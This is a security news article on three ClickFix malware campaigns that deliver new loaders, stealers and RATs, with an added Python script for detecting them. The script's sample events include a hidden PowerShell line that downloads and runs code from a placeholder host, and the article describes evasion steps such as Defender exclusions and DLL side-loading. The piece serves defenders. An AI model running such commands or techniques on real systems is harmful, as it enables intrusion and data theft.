ClickFix Campaigns Leverage New Loaders in Malware Delivery Push

"This new framework keeps that same code genome but expands it into a far more capable loader built for stealth, evasion, and payload flexibility," Morphisec researcher Shmuel Uzan said.

BabaDeda Loader: an evolved loader framework (Morphisec)

Morphisec researchers reported ClickFix attacks in April 2026 that used a revamped BabaDeda Loader to target education and financial organizations. According to Morphisec, the loader retains the "code genome" of earlier BabaDeda activity but extends it into a stealthy, flexible loader that chains together multiple techniques — hidden PowerShell, in-memory shellcode, DLL side‑loading, and external payload storage — to deliver information stealers and remote access trojans (RATs).

Morphisec details that the campaign begins with a ClickFix social engineering lure that convinces victims to run attacker-supplied PowerShell commands. The loader profiles hosts, avoids running on Russian or Belarusian systems, checks security products before retrieving a payload, and injects that payload into trusted Windows processes such as svchost.exe.

One follow-on payload is a .NET backdoor and information stealer with a broad feature set, able to:

  • Collect detailed system information and discover installed browser profiles
  • Extract browser artifacts — cookies, browsing history, saved credentials, preferences, and local-state encryption keys
  • Traverse directories using configurable file-selection rules and read and exfiltrate file contents
  • Capture screenshots, execute shell commands or external processes, and transfer data to a command-and-control (C2) server
  • Use native Windows APIs for process interaction, memory operations, DPAPI access, Restart Manager behavior, and advanced file access

Storage Crypter and staged delivery: DanaBot and SectopRAT

Morphisec also described a second BabaDeda chain in which a ZIP archive uses a staged component dubbed Storage Crypter. The crypter reads payload material from externally stored containers such as "List.Control.dat," keeping visible installer packages legitimate while hiding malicious contents externally and decoding them only moments before execution. Morphisec warns this design "minimizes forensic visibility, complicates automated analysis, and reduces opportunities for traditional security tools to identify malicious activity before execution occurs."

Lorem Ipsum Loader and Vanilla Tempest attribution (BlueVoyant)

BlueVoyant researchers Thomas Elkins and Joshua Green described a separate ClickFix campaign that delivers a nascent loader and backdoor called Lorem Ipsum Loader, active in the wild since February 2026. The campaign starts from at least five compromised WordPress sites across architecture, legal services, and construction technology sectors and uses Edge web browser security update lures to run a malicious command that downloads a ZIP and an outdated Node.js 7.10.1 runtime released in 2017.

BlueVoyant attributes the Lorem Ipsum ecosystem with high confidence to a financially motivated actor known as Vanilla Tempest (also tracked as Rapid Brigantine, Vice Society, and Vice Spider). The chain uses JavaScript-based droppers and batch scripts to establish persistence through DLL side‑loading (targeting mscoree.dll or msvcp140.dll), decode the embedded Lorem Ipsum Loader, and then retrieve a next-stage Lorem Ipsum Backdoor from C2 infrastructure hosted via attacker-controlled social profiles. BlueVoyant said the backdoor can run next-stage payloads and that the chain "culminates in handoff to Rapid Brigantine's established post-exploitation tooling and ultimately to their documented ransomware deployments, primarily Rhysida."

BlueVoyant also connected this delivery change to a decline in access to fraudulently signed Microsoft Trusted Signing certificates after Microsoft disrupted a group known as Fox Tempest (aka Forging Marauder). "The loss of certificate supply rendered the previously signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely," the researchers said.

Potemkin, RMMProject, and EtherRAT (Huntress)

Huntress researchers Anna Pham and Zach Rogers reported a third ClickFix campaign that installs an MSI package and drops a previously undocumented Potemkin loader via an HTA payload. Potemkin is a custom x64 loader that uses a domain generation algorithm (DGA) driven by a built‑in 1,000-word dictionary to find C2, reflectively loads modules in memory, and writes a unique UUID to "%LOCALAPPDATA%\hyper-v.ver" for victim identification. The loader supports task polling, DLL retrieval and execution, and a custom byte cipher protecting C2 communication and the DGA dictionary.

Huntress found Potemkin was used to stage EtherRAT and RMMProject. RMMProject is a Lua-scriptable DLL that can remotely screen-control victims, collect browser credentials by bypassing Chromium App‑Bound Encryption protections, dispatch tasks to run files or processes, take screenshots, execute arbitrary Lua scripts, and download runtime modules. Huntress reported hands-on-keyboard activity after access: configuring Microsoft Defender exclusions, deploying Chisel reverse SOCKS tunnels, establishing a Cloudflare tunnel for persistence, and lateral propagation via WMIExec and SMBExec to reach a domain controller, spreading EtherRAT across more than 11 hosts. This activity was detected by the vendor "last month."

What this means for security teams, enterprises, and macOS users

Security teams and technologists should note a clear pattern: modular, staged loaders separate delivery, storage, execution, and payload deployment to reduce forensic visibility and complicate automated detection. The campaigns combine social-engineering-delivered PowerShell and browser security update lures with DLL side‑loading, reflective loading, and external payload containers.
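As an added illustration of the "small behavioral signals" defenders are left to look for (this is example code written for this page, not tooling from Morphisec, BlueVoyant, Huntress, or the article), the script below runs a few simple rules over constructed endpoint telemetry. It flags the three behaviours the reporting above describes: a hidden or encoded PowerShell launched from the desktop shell, creation of the Potemkin victim marker at %LOCALAPPDATA%\hyper-v.ver, and a Microsoft Defender exclusion being written. The event schema is a hypothetical simplification rather than any real Sysmon or EDR format, and the assumption that a ClickFix paste lands in PowerShell with explorer.exe as the parent (the Run dialog path) is mine, not the article's.

```python
"""Rule-based detection pass over constructed endpoint events (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class Event:
    kind: str                 # "process", "file" or "registry" (hypothetical schema)
    image: str = ""           # image of the process that performed the action
    parent: str = ""          # parent image, only meaningful for "process"
    cmdline: str = ""         # command line, only meaningful for "process"
    path: str = ""            # file path or registry key written


# ClickFix pastes usually hide the console or pass an encoded command.
HIDDEN_PS = re.compile(r"-(?:w|windowstyle)\s+hidden|-(?:enc|encodedcommand)\s", re.I)
# Potemkin victim-ID marker as described by Huntress; regex written for Windows paths.
MARKER = re.compile(r"\\AppData\\Local\\hyper-v\.ver$", re.I)
# Defender exclusions are persisted under this key (Add-MpPreference -ExclusionPath
# lands here; Defender also logs the change as event ID 5007 in its Operational log).
DEFENDER_EXCL = re.compile(r"\\Windows Defender\\Exclusions\\", re.I)


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule_name, evidence) pairs for every event matching a rule."""
    findings = []
    for e in events:
        if (e.kind == "process"
                and e.image.lower().endswith(("powershell.exe", "pwsh.exe"))
                and e.parent.lower().endswith("explorer.exe")   # assumption: Run-dialog parent
                and HIDDEN_PS.search(e.cmdline)):
            findings.append(("clickfix_hidden_powershell", e.cmdline))
        elif e.kind == "file" and MARKER.search(e.path):
            findings.append(("potemkin_victim_marker", e.path))
        elif e.kind == "registry" and DEFENDER_EXCL.search(e.path):
            findings.append(("defender_exclusion_added", e.path))
    return findings


# Constructed sample telemetry: three malicious events interleaved with two benign ones.
SAMPLE_EVENTS = [
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe",
          cmdline='powershell.exe -w hidden -c "iwr http://example.invalid/stage | iex"'),
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\System32\cmd.exe",
          cmdline="powershell.exe -File C:\\scripts\\inventory.ps1"),        # benign
    Event("file", image=r"C:\Users\alice\AppData\Local\Temp\loader.exe",
          path=r"C:\Users\alice\AppData\Local\hyper-v.ver"),
    Event("registry", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          path=r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\alice\AppData\Local"),
    Event("registry", image=r"C:\Windows\explorer.exe",
          path=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"),  # benign
]


if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

Each rule on its own is noisy in a real estate (administrators do run hidden PowerShell and do add exclusions), which is the point the article makes about decoupled stages: the value comes from correlating the marker file, the exclusion change, and the odd parent process on the same host within a short window, rather than from any single hit.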

Affected enterprises and procurement leaders should register the operational impact described by Huntress — hands-on configuration of Defender exclusions, tunnel setup, and lateral spread — as a reminder that initial click-and-paste social engineering can yield persistent, high‑privilege access that reaches domain controllers and multiple hosts.

End users — and specifically macOS users — face a continuing social-engineering risk. Huntress noted ClickFix remains effective because it exploits ordinary troubleshooting behavior, and Apple has introduced a macOS Tahoe 26.4 security pop-up that warns users when they attempt to paste commands into Terminal. Apple said the alert "helps make sure that you aren't tricked into running a command that you didn't expect."

These investigations together illustrate a common trajectory: when one delivery model becomes untenable, operators adapt. ClickFix lures — deceptively simple instructions presented as legitimate troubleshooting — have given attackers a flexible on-ramp to multiple loaders and established malware families, from data‑stealers and RATs to ransomware handoffs. As Morphisec, BlueVoyant, and Huntress show, the loaders are growing more modular and stealthy, leaving defenders to spot small behavioral signals amid decoupled stages of execution.

https://thehackernews.com/2026/06/clickfix-campaigns-expand-malware.html